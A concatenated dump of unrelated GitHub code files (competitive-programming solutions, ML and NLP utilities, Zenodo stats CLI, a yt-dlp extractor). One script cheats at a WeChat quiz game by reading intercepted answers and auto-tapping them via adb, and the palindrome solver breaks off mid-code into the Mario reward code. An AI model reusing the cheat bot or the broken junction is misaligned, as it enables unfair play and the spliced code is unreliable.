= False\n ans.pop()\n\n\n# 3 + 8 = 11\n# 5 + 8 = 13\ndfs(0)\nprint(res)\n","repo_name":"LEEHYUNDONG/codingTest","sub_path":"codingTest_python/BOJ/BOJ_startLinkTeam.py","file_name":"BOJ_startLinkTeam.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"22872223799","text":"#https://leetcode.com/problems/palindrome-partitioning/\n#time O(2^N) space O(N*2^N)\nclass Solution:\n def partition(self, s: str) -> List[List[str]]:\n def isPalindrome(cur):\n i = 0\n j = len(cur)-1\n while i 100:\n reward += 300.0\n self._currentX = info['x']\n\n\n #punishes blocked agent\n if info['blocked'] == 5:\n reward -= 200.0\n\n\n #punishes stay quiet\n if info['timer1'] == 9:\n self._currentX = info['x']\n self._aux = False\n\n if self._timer:\n self._start = time.time()\n self._currentX = info['x']\n self._timer = False\n\n if time.time() > self._start + 5:\n if (info['x'] - self._currentX) < 60:\n reward -= 350.0\n self._timer = True\n\n #rewards when grab bonus flag\n if info['endOfLevel']:\n if info['finalFlag'] == self._finalFlag:\n reward += 7000.0\n else:\n reward += 4500.0\n\n t = info['timer100'] * 10 + info['timer10']\n if t > 25:\n reward += 10000.0\n\n self.env.render()\n\n return state, reward / 100.0, done, info\n","repo_name":"g-rm/Super-Mario","sub_path":"mario_util.py","file_name":"mario_util.py","file_ext":"py","file_size_in_byte":3761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"5893756262","text":"import re\nimport numpy as np\nimport numpy.linalg as la\n\nfrom pyspark.sql.functions import udf\nfrom pyspark.sql.types import IntegerType, StringType, FloatType\n\nfrom .stopwords import STOP_WORDS\n\n\ndef sub_usertags(text: str, sub_token=\"\") -> str:\n \"\"\"Substitute usernames (starts with '@' symbol) with a custom token.\n\n Args:\n text (str): Input text string to process.\n sub_token (str, optional): A custom token to substitute for a username. Defaults to \"\".\n\n Returns:\n str: Processed input string.\n \"\"\"\n\n return re.sub(r\"@[\\S]+\", sub_token, text)\n\n\ndef sub_hashtags(text: str, sub_token=None) -> str:\n \"\"\"Substitute hashtags (starts with '#' symbol) with a custom token.\n\n Args:\n text (str): Input text string to process.\n sub_token (str, optional): A custom token to substitute for a hashtag. If None, then function substitutes hashtag with the corresponding word. Defaults to None.\n\n Returns:\n str: Processed input string.\n \"\"\"\n\n return re.sub(r\"(#)([\\S]+)\", sub_token if sub_token is not None else r\"\\2\", text)\n\n\ndef sub_unicode(text: str, sub_token=\" \") -> str:\n \"\"\"Substitute Unicode symbols.\n\n Args:\n text (str): Input text string to process.\n sub_token (str, optional): A custom token to substitute. Defaults to ' '.\n\n Returns:\n str: Processed input string.\n \"\"\"\n\n return re.sub(r\"[^\\u0000-\\u007F]+\", sub_token, text)\n\n\ndef sub_sepr(text: str, sub_token=\" \") -> str:\n \"\"\"Substitute common line separation symbols (`\\\\n`, `\\\\r`, `\\\\t`).\n\n Args:\n text (str): Input text string to process.\n sub_token (str, optional): A custom token to substitute. Defaults to ' '.\n\n Returns:\n str: Processed input string.\n \"\"\"\n\n return re.sub(r\"[\\n\\r\\t]+\", sub_token, text)\n\n\ndef sub_punc(text: str, sub_token=\" \") -> str:\n \"\"\"Substitute punctuation symbols:\n ```['!', '\"', '#', '$', '%', '&', '(', ')', '*', '+', ',', '.', '/', ':', ';', '<', '=', '>', '?', '@', '\\\\', '^', '_', '`', '{', '|', '}', '~', '[', ']', '-']```\n\n Args:\n text (str): Input text string to process.\n sub_token (str, optional): A custom token to substitute. Defaults to ' '.\n\n Returns:\n str: Processed input string.\n \"\"\"\n\n return re.sub(r'[!\"#$%&\\(\\)\\*\\+,\\./:;<=>?@\\\\^_`{|}~\\[\\]-]+', sub_token, text)\n\n\ndef sub_url(text: str, sub_token=\"\") -> str:\n \"\"\"Substitute web resource link (URL) with a custom token.\n\n Args:\n text (str): Input text string to process.\n sub_token (str, optional): A custom token to substitute. Defaults to ''.\n\n Returns:\n str: Processed input string.\n \"\"\"\n\n return re.sub(\n r\"^https?:\\\\/\\\\/(?:www\\\\.)?[-a-zA-Z0-9@:%._\\\\+~#=]{1,256}\\\\.[a-zA-Z0-9()]{1,6}\\\\b(?:[-a-zA-Z0-9()@:%_\\\\+.~#?&\\\\/=]*)$\",\n sub_token,\n text,\n )\n\n\ndef sub_numwords(text: str, sub_token=\"\") -> str:\n \"\"\"Substitute words that contain digits.\n\n Args:\n text (str): Input text string to process.\n sub_token (str, optional): A custom token to substitute. Defaults to ''.\n\n Returns:\n str: Processed input string.\n \"\"\"\n\n return re.sub(r\"\\b(\\w)*(\\d)(\\w)*\\b\", sub_token, text)\n\n\ndef sub_stopwords(text: str, sub_token=\"\") -> str:\n \"\"\"Substitute English stopwords.\n\n Args:\n text (str): Input text string to process.\n sub_token (str, optional): A custom token to substitute. Defaults to ''.\n\n Returns:\n str: Processed input string.\n \"\"\"\n\n return \" \".join(\n [word if word not in STOP_WORDS else sub_token for word in text.split(\" \")]\n )\n\n\ndef sub_space(text: str, sub_token=\" \") -> str:\n \"\"\"Substitute 2+ adjacent space characters with a single space character.\n\n Args:\n text (str): Input text string to process.\n sub_token (str, optional): An alternative to a single space character. Defaults to ' '.\n\n Returns:\n str: Processed input string.\n \"\"\"\n\n return re.sub(r\"[ ]+\", sub_token, text)\n\n\ndef iter_proc(text: str, steps=[]) -> str:\n \"\"\"Iterative preprocessing of a text data.\n\n Args:\n text (str): Input text string to process.\n steps (list, optional): User defined processing steps of a `Callable` type. Defaults to [].\n\n Returns:\n str: Processed input string.\n \"\"\"\n\n for step in steps:\n text = step(text)\n\n return text\n\n\ndef social_proc(text: str) -> str:\n \"\"\"Preprocess text string related to a social media (e.g. a blog post): normalize and remove URLs, usernames, hashtags, separation symbols, words with numbers, and redundant spaces.\n\n Args:\n text (str): Input text string to process.\n\n Returns:\n str: Processed input string.\n \"\"\"\n\n return iter_proc(\n text,\n steps=[\n lambda text: text.lower(),\n lambda text: sub_url(text),\n lambda text: sub_usertags(text),\n lambda text: sub_hashtags(text),\n lambda text: sub_sepr(text),\n lambda text: sub_numwords(text),\n lambda text: sub_space(text),\n lambda text: text.strip(),\n ],\n )\n\n\ndef full_proc(text: str) -> str:\n \"\"\"Preprocess text with all available pipelines.\n\n Args:\n text (str): Input text string to process.\n\n Returns:\n str: Processed input string.\n \"\"\"\n\n return iter_proc(\n text,\n steps=[\n lambda text: text.lower(),\n lambda text: sub_url(text),\n lambda text: sub_usertags(text),\n lambda text: sub_hashtags(text),\n lambda text: sub_unicode(text),\n lambda text: sub_sepr(text),\n lambda text: sub_punc(text),\n lambda text: sub_numwords(text),\n lambda text: sub_stopwords(text),\n lambda text: sub_space(text),\n lambda text: text.strip(),\n ],\n )\n\n\ndef cosine_sim(x: np.array, y: np.array) -> np.array:\n \"\"\"Compute a cosine similarity between `x` and `y` vectors: `cos(x, y) = x @ y / (||x|| * ||y||)`\n\n Example:\n >>> cosine_sim(np.array([1.0, 1.0, 1.0, 1.0]), np.array([0.5, -3.0, 0.25, -1.0]))\n -0.5060243137049899\n\n Args:\n x (np.array): An input vector.\n y (np.array): Another input vector.\n\n Returns:\n np.array: Cosine similarity vector.\n \"\"\"\n\n return x @ y / (la.norm(x) * la.norm(y))\n\n\n# Preprocessing UDFs\nstrip_udf = udf(lambda text: text.strip(), StringType())\nnormalise_udf = udf(lambda text: text.lower(), StringType())\nsub_url_udf = udf(lambda text: sub_url(text), StringType())\nsub_usertags_udf = udf(lambda text: sub_usertags(text), StringType())\nsub_hashtags_udf = udf(lambda text: sub_hashtags(text), StringType())\nsub_unicode_udf = udf(lambda text: sub_unicode(text), StringType())\nsub_sepr_udf = udf(lambda text: sub_sepr(text), StringType())\nsub_punc_udf = udf(lambda text: sub_punc(text), StringType())\nsub_numwords_udf = udf(lambda text: sub_numwords(text), StringType())\nsub_stopwords_udf = udf(lambda text: sub_stopwords(text), StringType())\nsub_space_udf = udf(lambda text: sub_space(text), StringType())\n\n# Metrics UDFs\ncosine_sim_udf = udf(lambda x, y: cosine_sim(x, y), FloatType())\nwordlen_udf = udf(lambda text: len(text.split(\" \")), IntegerType())\ncharlen_udf = udf(lambda text: len(text), IntegerType())\n\n# Custom UDFs\nsocial_proc_udf = udf(lambda text: social_proc(text), StringType())\nfull_proc_udf = udf(lambda text: full_proc(text), StringType())\n","repo_name":"antonAce/pyspark-env","sub_path":"util/nlp/udf.py","file_name":"udf.py","file_ext":"py","file_size_in_byte":7476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"20565201872","text":"# SPDX-License-Identifier: LGPL-3.0-or-later\n\"\"\"Root of the mdpukit package, exposes all public classes and submodules.\"\"\"\n\ntry:\n from importlib import (\n metadata,\n )\nexcept ImportError: # for Python<3.8\n import importlib_metadata as metadata\n\nimport mdpukit.utils.network as network\n\nfrom . import (\n cluster,\n descriptor,\n fit,\n loss,\n mdpu,\n utils,\n)\nfrom .env import (\n set_mkl,\n)\nfrom .infer import (\n DeepEval,\n DeepPotential,\n)\n\nset_mkl()\n\ntry:\n from ._version import version as __version__\nexcept ImportError:\n from .__about__ import (\n __version__,\n )\n\n# load third-party plugins\ntry:\n eps = metadata.entry_points(group=\"mdpukit\")\nexcept TypeError:\n eps = metadata.entry_points().get(\"mdpukit\", [])\nfor ep in eps:\n ep.load()\n\n__all__ = [\n \"__version__\",\n \"descriptor\",\n \"fit\",\n \"loss\",\n \"utils\",\n \"cluster\",\n \"network\",\n \"DeepEval\",\n \"DeepPotential\",\n \"mdpu\",\n]\n","repo_name":"LiuGroupHNU/md-data","sub_path":"code/mdpukit/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":971,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"36085953112","text":"from aoc_components.input_getter import get_my_input\nfrom typing import Dict, Tuple\nimport itertools\nfrom collections import defaultdict\n\ninp = get_my_input(__file__)\n\n\ndef get_total_likings(sitting: tuple, likings: Dict[Tuple[str, str], int]):\n c = 0\n s = len(sitting)\n for i in range(s-1):\n a = sitting[i]\n b = sitting[i+1]\n c += likings[(a, b)] + likings[(b, a)]\n a = sitting[s-1]\n b = sitting[0]\n c += likings[(a, b)] + likings[(b, a)]\n return c\n\n\nif __name__ == \"__main__\":\n likings = defaultdict(int)\n people = set()\n for line in inp.splitlines():\n x, B = line.split(\" happiness units by sitting next to \")\n B = B.strip(\".\")\n A, g = x.split(\" would \")\n G, V = g.split(\" \")\n V = int(V)\n if G == \"lose\":\n V = 0-V\n likings[(A, B)] = int(V)\n\n for dist in likings:\n people.add(dist[0])\n people.add(dist[1])\n\n def get():\n return max(\n (get_total_likings(r, likings)\n for r\n in itertools.permutations(people))\n )\n\n print(get())\n people.add(\"Me\")\n print(get())\n","repo_name":"GsakuL/AdventOfCode","sub_path":"2015/day13.py","file_name":"day13.py","file_ext":"py","file_size_in_byte":1152,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"70586058064","text":"from django import template\nfrom django.core import urlresolvers\n\n__author__ = 'Pierre Rodier | pierre@buffactory.com'\n\nregister = template.Library()\n\n\ndef current_url_equals(context, url_name, **kwargs):\n resolved = False\n try:\n resolved = urlresolvers.resolve(context.get('request').path)\n except:\n pass\n matches = resolved and resolved.url_name == url_name\n if matches and kwargs:\n for key in kwargs:\n kwarg = kwargs.get(key)\n resolved_kwarg = resolved.kwargs.get(key)\n\n if kwarg:\n # for the comparison of same type url arg d+ w+\n kwarg = unicode(kwarg)\n\n if not resolved_kwarg or kwarg != resolved_kwarg:\n return False\n return matches\n\n\n@register.simple_tag(takes_context=True)\ndef current(context, url_name, return_value=' active', **kwargs):\n matches = current_url_equals(context, url_name, **kwargs)\n\n return return_value if matches else ''\n","repo_name":"jisson/sketchfab_backend_test","sub_path":"sketchfab/templatetags/sketchfab_extras.py","file_name":"sketchfab_extras.py","file_ext":"py","file_size_in_byte":982,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"39009878120","text":"from word2vec_base import Word2VecCPU\nfrom word2vec_base_th import Word2VecGPU\nfrom word2vec_freq_word_sampling import Word2VecFreqWordSamplingCPU\nfrom word2vec_freq_word_sampling_th import Word2VecFreqWordSamplingGPU\nfrom word2vec_freqwords_phrases import Word2VecLearnPhraseSampleFreqWordCPU\nfrom word2vec_freqwords_phrases_th import Word2VecLearnPhraseSampleFreqWordGPU\nfrom word2vec_negative_sampling_np import Word2VecNegSamplingCPU\nfrom word2vec_negative_sampling_th import Word2VecNegSamplingGPU\nimport os\nimport torch as th\n\n\nif __name__ == '__main__':\n gpu_models = [\n Word2VecLearnPhraseSampleFreqWordGPU, Word2VecFreqWordSamplingGPU, Word2VecGPU, Word2VecNegSamplingGPU\n ]\n\n cpu_models = [\n Word2VecCPU, Word2VecFreqWordSamplingCPU, Word2VecLearnPhraseSampleFreqWordCPU, Word2VecNegSamplingCPU\n ]\n\n th.multiprocessing.set_start_method('spawn')\n th.backends.cuda.matmul.allow_tf32 = True\n th.backends.cudnn.allow_tf32 = True\n\n dataset1_f = os.path.join(os.getcwd() + \"/interview_ds.txt\")\n dataset2_f = os.path.join(os.getcwd() + \"/interview_ds_2.txt\")\n\n with open(dataset1_f, \"r\") as f:\n corpus1 = f.read()\n with open(dataset2_f, \"r\") as f:\n corpus2 = f.read()\n\n corpus = corpus1 + corpus2\n # gpu_models = [Word2VecNegSamplingGPU]\n\n for word2vec_model in gpu_models[:-1]:\n model = word2vec_model(corpus1[:int(1e6)], embedding_dim=100)\n print(f\"Running model {model}\")\n model.train(3)\n predictions = model.predict(\"puppy\", 3)\n print(predictions, \" are predictiosn for word \", \"puppy\")\n print(50*\"-\")\n","repo_name":"debasishdebs/LLM-Finetuning","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1621,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"36308695731","text":"# _*_ coding:utf-8 _*_\nfrom watchdog.observers import Observer\nfrom watchdog.events import *\nimport time\nimport json\nimport os\n\n# option0是错号的坐标,option1是对号的坐标\nconf = {\n \"option0\": {\n \"x\": 810,\n \"y\": 1650,\n },\n \"option1\": {\n \"x\": 270,\n \"y\": 1650,\n }\n}\n\n\n# 点击相应坐标\ndef adb_tap(option):\n os.system('adb shell input tap {0} {1}'.format(conf[option]['x'], conf[option]['y']))\n\n\n# 顺次点击40道题的答案\ndef read_question(response):\n global start\n global num\n # 每次抓包可以得到40个答案\n for i in range(40):\n # 游戏开始有个开场动画,需要等待一下再点击\n if start:\n start = False\n time.sleep(2)\n is_true = response[str(i)]['is_true']\n adb_tap('option' + str(is_true))\n if i != 39:\n time.sleep(sleep_time)\n num += 1\n print(\"第{}道题, {}\".format(num, is_true))\n\n\n# 监控json文件变化\nclass FileEventHandler(FileSystemEventHandler):\n def __init__(self):\n FileSystemEventHandler.__init__(self)\n\n def on_created(self, event):\n if os.path.exists(path):\n with open(path) as f:\n # 获得json,解析,删除json\n time.sleep(sleep_time)\n response = json.load(f)\n f.close()\n os.remove(path)\n read_question(response)\n\n\nif __name__ == \"__main__\":\n # 更改!保存的json文件\n path = 'D:\\ADB\\question\\jjds.iwillgo.cn\\index\\index_one_nine_six\\sprint_game'\n sleep_time = 0.05\n start = True\n # 答题数目\n num = 0\n # 判断一下是否有之前残存的json,有就先删除\n if os.path.exists(path):\n os.remove(path)\n \"\"\"\n watchdog主要采用观察者模型。主要有三个角色:observer,event_handler,被监控的文件夹。\n 三者原本是独立的,主要通过observer.schedule函数将三者串起来,\n observer不断检测调用平台依赖代码对监控文件夹进行变动检测.当发现改变时,通知event_handler处理。\n \"\"\"\n observer = Observer()\n event_handler = FileEventHandler()\n # 更改!保存的json文件所属位置\n observer.schedule(event_handler, r'D:\\ADB\\question\\jjds.iwillgo.cn\\index\\index_one_nine_six\\\\', True)\n print('助手已经运行,请开始游戏')\n observer.start()\n try:\n while True:\n time.sleep(0)\n except KeyboardInterrup:\n observer.stop()\n observer.join()\n","repo_name":"MrMrShao/WechatGameAutoClick","sub_path":"get_answer.py","file_name":"get_answer.py","file_ext":"py","file_size_in_byte":2547,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"69840121744","text":"import os\nfrom os.path import basename\nfrom time import sleep\n\nimport win32gui\n\nfrom p0_backend.lib.ableton.interface.coords import Coords, RectCoords\nfrom p0_backend.lib.ableton.interface.pixel import (\n get_coords_for_color,\n)\nfrom p0_backend.lib.ableton.interface.pixel_color_enum import PixelColorEnum\nfrom p0_backend.lib.decorators import retry\nfrom p0_backend.lib.errors.Protocol0Error import Protocol0Error\nfrom p0_backend.lib.mouse.mouse import click, drag_to, move_to\nfrom p0_backend.lib.process import kill_window_by_criteria\nfrom p0_backend.lib.window.window import focus_window, move_window, window_contains_coords\n\n\ndef open_explorer(file_path: str) -> int:\n assert os.path.exists(file_path), f\"'{file_path}' does not exist\"\n\n click((0, 500)) # move the cursor from the explorer window position\n folder_name = basename(os.path.split(file_path)[0])\n try:\n handle = focus_window(folder_name)\n sleep(0.1)\n return handle\n except (AssertionError, Protocol0Error):\n os.system(f\"explorer.exe /select, {file_path}\")\n handle = retry(50, 0.1)(focus_window)(name=folder_name)\n sleep(0.5)\n\n return handle\n\n\n@retry(2, 0)\ndef _open_explorer_until_selected(file_path: str, bbox: RectCoords, dest_coords: Coords):\n handle = open_explorer(file_path)\n\n window_bbox = win32gui.GetWindowRect(handle)\n\n # move window if its in the way\n if window_contains_coords(window_bbox, dest_coords):\n move_window(handle, bbox)\n window_bbox = bbox\n\n x, y, x2, y2 = window_bbox\n\n try:\n return retry(3, 0)(get_coords_for_color)(\n [\n PixelColorEnum.EXPLORER_SELECTED_ENTRY,\n PixelColorEnum.EXPLORER_SELECTED_ENTRY_LIGHT,\n ],\n bbox=(x + 200, y + 200, x2, y2),\n )\n except Protocol0Error as e:\n close_samples_windows()\n raise e\n\n\ndef drag_file_to(\n file_path: str,\n dest_coords: Coords,\n bbox: RectCoords,\n drag_duration=0.5,\n close_window=True,\n):\n x, y = _open_explorer_until_selected(file_path, bbox, dest_coords)\n\n move_to((x, y + 10))\n drag_to(dest_coords, duration=drag_duration)\n\n if close_window:\n folder_name = basename(os.path.split(file_path)[0])\n\n kill_window_by_criteria(name=folder_name)\n\n\ndef close_samples_windows():\n kill_window_by_criteria(name=\"Recorded\")\n kill_window_by_criteria(name=\"Freeze\")\n\n\ndef close_explorer_window(title: str):\n kill_window_by_criteria(name=title)\n","repo_name":"lebrunthibault/protocol0","sub_path":"p0_backend/p0_backend/lib/explorer.py","file_name":"explorer.py","file_ext":"py","file_size_in_byte":2507,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"43612083537","text":"import csv\nimport glob\nimport re\nimport sys\nfrom datetime import datetime as dt\n\nimport click\nfrom dateutil.parser import parse as dateutil_parse\nfrom flask.cli import with_appcontext\nfrom invenio_stats.cli import stats\nfrom invenio_stats.proxies import current_stats\nfrom six.moves import filter, map\nfrom six.moves.urllib.parse import urlparse\n\nfrom zenodo.modules.stats.tasks import update_record_statistics\nfrom zenodo.modules.stats.utils import chunkify, \\\n extract_event_record_metadata, fetch_record, fetch_record_file\n\nPY3 = sys.version_info[0] == 3\n\n\ndef _verify_date(ctx, param, value):\n if value:\n dateutil_parse(value)\n return value\n\n\ndef parse_record_url(url):\n \"\"\"Parses a recid and filename from a record-like URL.\"\"\"\n record_url = urlparse(url)\n assert record_url.hostname.lower().endswith('zenodo.org'), 'non-Zenodo url'\n match = re.match(\n # matches \"/record/(123)\", \"/record/(123)/export\", etc\n r'^\\/record\\/(?P\\d+)'\n # matches \"/record/(123)/files/(some.pdf)\"\n r'(?:\\/files\\/(?P.+)$)?',\n record_url.path).groupdict()\n return match.get('recid'), match.get('filename')\n\n\ndef build_common_event(record, data):\n \"\"\"Build common fields of a stats event from a record and request data.\"\"\"\n return dict(\n timestamp=dt.utcfromtimestamp(float(data['timestamp'])).isoformat(),\n pid_type='recid',\n pid_value=str(record.get('recid')),\n referrer=data['referrer'],\n ip_address=data['ipAddress'],\n user_agent=data['userAgent'],\n user_id=None,\n **extract_event_record_metadata(record)\n )\n\n\ndef build_record_view_event(data):\n \"\"\"Build a 'record-view' event from request data.\"\"\"\n try:\n recid, _ = parse_record_url(data['url'])\n assert recid, 'no recid in url'\n _, record = fetch_record(recid)\n except Exception:\n return\n\n return build_common_event(record, data)\n\n\ndef build_file_download_event(data):\n \"\"\"Build a 'file-download' event from request data.\"\"\"\n try:\n recid, filename = parse_record_url(data['url'])\n assert recid and filename, 'no recid and filename in url'\n _, record = fetch_record(recid)\n obj = fetch_record_file(recid, filename)\n except Exception:\n return\n\n return dict(\n bucket_id=str(obj.bucket_id),\n file_id=str(obj.file_id),\n file_key=obj.key,\n size=obj.file.size,\n **build_common_event(record, data)\n )\n\n\nEVENT_TYPE_BUILDERS = {\n 'record-view': build_record_view_event,\n 'file-download': build_file_download_event,\n}\n\n\n@stats.command('import')\n@click.argument('event-type', type=click.Choice(EVENT_TYPE_BUILDERS.keys()))\n@click.argument('csv-dir', type=click.Path(file_okay=False, resolve_path=True))\n@click.option('--chunk-size', '-s', type=int, default=100)\n@with_appcontext\ndef import_events(event_type, csv_dir, chunk_size):\n r\"\"\"Import stats events from a directory of CSV files.\n\n Available event types: \"file-download\", \"record-view\"\n\n The following columns should always be present:\n\n \\b\n - ipAddress\n - userAgent\n - url (\"https://zenodo.org/record/1234/files/article.pdf\")\n - timestamp (1388506249)\n - referrer (\"Google\", \"example.com\", etc)\n \"\"\"\n csv_files = glob.glob(csv_dir + '/*.csv')\n with click.progressbar(csv_files, len(csv_files)) as csv_files_bar:\n for csv_path in csv_files_bar:\n with open(csv_path, 'r' if PY3 else 'rb') as fp:\n reader = csv.DictReader(fp, delimiter=',')\n events = filter(\n None, map(EVENT_TYPE_BUILDERS[event_type], reader))\n for event_chunk in chunkify(events, chunk_size):\n current_stats.publish(event_type, event_chunk)\n click.secho(\n 'Run the \"invenio_stats.tasks.process_events\" to index the events...',\n fg='yellow')\n\n\n@stats.command('update-records')\n@click.option('--start-date', callback=_verify_date)\n@click.option('--end-date', callback=_verify_date)\n@click.option('--eager', '-e', is_flag=True)\n@with_appcontext\ndef update_records(start_date=None, end_date=None, eager=False):\n \"\"\"Update records' statistics on ES.\"\"\"\n if eager:\n update_record_statistics.apply(\n kwargs=dict(start_date=start_date, end_date=end_date), throw=True)\n click.secho('Records sent for bulk indexing. Wait for the scheduled '\n 'indexer or run `zenodo index run ...`', fg='yellow')\n else:\n update_record_statistics.delay(\n start_date=start_date, end_date=end_date)\n click.secho('Update records statistics task sent...', fg='yellow')\n","repo_name":"zenodo/zenodo","sub_path":"zenodo/modules/stats/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":4700,"program_lang":"python","lang":"en","doc_type":"code","stars":847,"dataset":"github-code","pt":"47"} +{"seq_id":"72969273102","text":"class Solution:\n def frequencySort(self, s: str) -> str:\n \n \n dic=Counter(s)\n dic=dict(sorted(dic.items(), key=lambda x:x[1], reverse=True ))\n\n a=''\n \n for k , v in dic.items():\n \n a+=k*v\n return a","repo_name":"gauravblog-art/My_coding_journey","sub_path":"0451-sort-characters-by-frequency/0451-sort-characters-by-frequency.py","file_name":"0451-sort-characters-by-frequency.py","file_ext":"py","file_size_in_byte":254,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"12470865445","text":"from .common import InfoExtractor\nfrom ..utils import (\n ExtractorError,\n clean_html,\n merge_dicts,\n parse_iso8601,\n url_or_none,\n)\nfrom ..utils.traversal import traverse_obj\n\n\nclass AsobiChannelBaseIE(InfoExtractor):\n _MICROCMS_HEADER = {'X-MICROCMS-API-KEY': 'qRaKehul9AHU8KtL0dnq1OCLKnFec6yrbcz3'}\n\n def _extract_info(self, metadata):\n return traverse_obj(metadata, {\n 'id': ('id', {str}),\n 'title': ('title', {str}),\n 'description': ('body', {clean_html}),\n 'thumbnail': ('contents', 'video_thumb', 'url', {url_or_none}),\n 'timestamp': ('publishedAt', {parse_iso8601}),\n 'modified_timestamp': ('updatedAt', {parse_iso8601}),\n 'channel': ('channel', 'name', {str}),\n 'channel_id': ('channel', 'id', {str}),\n })\n\n\nclass AsobiChannelIE(AsobiChannelBaseIE):\n IE_NAME = 'asobichannel'\n IE_DESC = 'ASOBI CHANNEL'\n\n _VALID_URL = r'https?://asobichannel\\.asobistore\\.jp/watch/(?P[\\w-]+)'\n _TESTS = [{\n 'url': 'https://asobichannel.asobistore.jp/watch/1ypp48qd32p',\n 'md5': '39df74e872afe032c4eb27b89144fc92',\n 'info_dict': {\n 'id': '1ypp48qd32p',\n 'ext': 'mp4',\n 'title': 'アイドルマスター ミリオンライブ! 765プロch 原っぱ通信 #1',\n 'description': 'md5:b930bd2199c9b2fd75951ce4aaa7efd2',\n 'thumbnail': 'https://images.microcms-assets.io/assets/d2420de4b9194e11beb164f99edb1f95/a8e6f84119f54eb9ab4ce16729239905/%E3%82%B5%E3%83%A0%E3%83%8D%20(1).png',\n 'timestamp': 1697098247,\n 'upload_date': '20231012',\n 'modified_timestamp': 1698381162,\n 'modified_date': '20231027',\n 'channel': 'アイドルマスター',\n 'channel_id': 'idolmaster',\n },\n }, {\n 'url': 'https://asobichannel.asobistore.jp/watch/redigiwnjzqj',\n 'md5': '229fa8fb5c591c75ce8c37a497f113f6',\n 'info_dict': {\n 'id': 'redigiwnjzqj',\n 'ext': 'mp4',\n 'title': '【おまけ放送】アイドルマスター ミリオンライブ! 765プロch 原っぱ通信 #1',\n 'description': 'md5:7d9cd35fb54425a6967822bd564ea2d9',\n 'thumbnail': 'https://images.microcms-assets.io/assets/d2420de4b9194e11beb164f99edb1f95/20e5c1d6184242eebc2512a5dec59bf0/P1_%E5%8E%9F%E3%81%A3%E3%81%B1%E3%82%B5%E3%83%A0%E3%83%8D.png',\n 'modified_timestamp': 1697797125,\n 'modified_date': '20231020',\n 'timestamp': 1697261769,\n 'upload_date': '20231014',\n 'channel': 'ア��ドルマスター',\n 'channel_id': 'idolmaster',\n },\n }]\n\n _survapi_header = None\n\n def _real_initialize(self):\n token = self._download_json(\n 'https://asobichannel-api.asobistore.jp/api/v1/vspf/token', None,\n note='Retrieving API token')\n self._survapi_header = {'Authorization': f'Bearer {token}'}\n\n def _process_vod(self, video_id, metadata):\n content_id = metadata['contents']['video_id']\n\n vod_data = self._download_json(\n f'https://survapi.channel.or.jp/proxy/v1/contents/{content_id}/get_by_cuid', video_id,\n headers=self._survapi_header, note='Downloading vod data')\n\n return {\n 'formats': self._extract_m3u8_formats(vod_data['ex_content']['streaming_url'], video_id),\n }\n\n def _process_live(self, video_id, metadata):\n content_id = metadata['contents']['video_id']\n event_data = self._download_json(\n f'https://survapi.channel.or.jp/ex/events/{content_id}?embed=channel', video_id,\n headers=self._survapi_header, note='Downloading event data')\n\n player_type = traverse_obj(event_data, ('data', 'Player_type', {str}))\n if player_type == 'poster':\n self.raise_no_formats('Live event has not yet started', expected=True)\n live_status = 'is_upcoming'\n formats = []\n elif player_type == 'player':\n live_status = 'is_live'\n formats = self._extract_m3u8_formats(\n event_data['data']['Channel']['Custom_live_url'], video_id, live=True)\n else:\n raise ExtractorError('Unsupported player type {player_type!r}')\n\n return {\n 'release_timestamp': traverse_obj(metadata, ('period', 'start', {parse_iso8601})),\n 'live_status': live_status,\n 'formats': formats,\n }\n\n def _real_extract(self, url):\n video_id = self._match_id(url)\n\n metadata = self._download_json(\n f'https://channel.microcms.io/api/v1/media/{video_id}', video_id,\n headers=self._MICROCMS_HEADER)\n\n info = self._extract_info(metadata)\n\n video_type = traverse_obj(metadata, ('contents', 'video_type', 0, {str}))\n if video_type == 'VOD':\n return merge_dicts(info, self._process_vod(video_id, metadata))\n if video_type == 'LIVE':\n return merge_dicts(info, self._process_live(video_id, metadata))\n\n raise ExtractorError(f'Unexpected video type {video_type!r}')\n\n\nclass AsobiChannelTagURLIE(AsobiChannelBaseIE):\n IE_NAME = 'asobichannel:tag'\n IE_DESC = 'ASOBI CHANNEL'\n\n _VALID_URL = r'https?://asobichannel\\.asobistore\\.jp/tag/(?P[a-z0-9-_]+)'\n _TESTS = [{\n 'url': 'https://asobichannel.asobistore.jp/tag/bjhh-nbcja',\n 'info_dict': {\n 'id': 'bjhh-nbcja',\n 'title': 'アイドルマスター ミリオンライブ! 765プロch 原っぱ通信',\n },\n 'playlist_mincount': 16,\n }, {\n 'url': 'https://asobichannel.asobistore.jp/tag/hvm5qw3c6od',\n 'info_dict': {\n 'id': 'hvm5qw3c6od',\n 'title': 'アイマスMOIW2023ラジオ',\n },\n 'playlist_mincount': 13,\n }]\n\n def _real_extract(self, url):\n tag_id = self._match_id(url)\n webpage = self._download_webpage(url, tag_id)\n title = traverse_obj(self._search_nextjs_data(\n webpage, tag_id, fatal=False), ('props', 'pageProps', 'data', 'name', {str}))\n\n media = self._download_json(\n f'https://channel.microcms.io/api/v1/media?limit=999&filters=(tag[contains]{tag_id})',\n tag_id, headers=self._MICROCMS_HEADER)\n\n def entries():\n for metadata in traverse_obj(media, ('contents', lambda _, v: v['id'])):\n yield {\n '_type': 'url',\n 'url': f'https://asobichannel.asobistore.jp/watch/{metadata[\"id\"]}',\n 'ie_key': AsobiChannelIE.ie_key(),\n **self._extract_info(metadata),\n }\n\n return self.playlist_result(entries(), tag_id, 